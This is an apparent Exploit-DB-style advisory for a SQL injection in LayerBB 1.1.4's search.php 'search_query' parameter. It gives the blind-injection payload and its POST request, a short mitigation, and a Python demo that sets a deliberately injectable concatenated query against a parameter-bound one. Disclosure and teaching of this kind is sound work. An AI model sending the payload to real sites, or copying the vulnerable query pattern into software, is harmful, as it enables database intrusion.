Vendor: LayerBB
By: Görkem Haşin
CVSS: 7.5 HIGH
SQL Injection
CWE: 89
Product Name: LayerBB
Affected Version From: 1.1.4
Affected Version To: 1.1.4
Patch Exists: NO
Related CWE: N/A
CPE: a:layerbb:layerbb:1.1.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux/Windows
2021

LayerBB 1.1.4 – ‘search_query’ SQL Injection

LayerBB 1.1.4 is vulnerable to SQL injection through the 'search_query' parameter. An attacker can send a specially crafted payload in a POST request to the search.php page to exploit it. The payload sent in the POST request is:

search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
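
The following is an added example, not LayerBB code and not part of the original advisory: it runs the advisory's search_query value through a string-concatenated query and through a parameter-bound one, to show how the mitigation keeps user input out of the SQL text. Assumptions: the posts table, the LIKE query shape, the function names, and the use of Python with SQLite in place of LayerBB's PHP and database layer are all constructed for illustration, and parameter binding is a technique this page does not itself name.

```python
import sqlite3

# Value of search_query, copied from the advisory above.
PAYLOAD = ("Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 "
           "ELSE (SELECT 1560 UNION SELECT 2122) END))-- -")


def make_db():
    """Constructed stand-in table; not LayerBB's real schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO posts (title) VALUES (?)",
                   [("Welcome to the board",), ("Ask Lffd",), ("Rules",)])
    return db


def search_concat(db, term):
    """'Before' form (assumed query shape): input is pasted into the SQL text."""
    sql = "SELECT title FROM posts WHERE (title LIKE '%" + term + "%')"
    return [row[0] for row in db.execute(sql)]


def search_bound(db, term):
    """Hardened form: input is passed as a bound parameter, never as SQL text."""
    # Escape LIKE wildcards so % and _ typed by the user match literally.
    esc = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT title FROM posts WHERE (title LIKE ? ESCAPE '\\')"
    return [row[0] for row in db.execute(sql, ("%" + esc + "%",))]


def compare(term):
    """Run one search term through both forms; an SQL error is reported by name."""
    db = make_db()
    try:
        concat = search_concat(db, term)
    except sqlite3.Error as exc:
        concat = type(exc).__name__
    return concat, search_bound(db, term)


if __name__ == "__main__":
    for term in ("rules", "O'Brien", PAYLOAD):
        print(repr(term[:20]), compare(term))
```

In the concatenated form the text after `Lffd')` is parsed as SQL, so the query matches the title ending in "Lffd"; in the bound form the whole value is compared as a literal string and matches nothing.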

Exploit-DB raw data:

# Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection
# Date: 2021-02-19
# Exploit Author: Görkem Haşin
# Version: 1.1.4
# Tested on: Linux/Windows

# POST /search.php HTTP/1.1
# Host: Target

Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search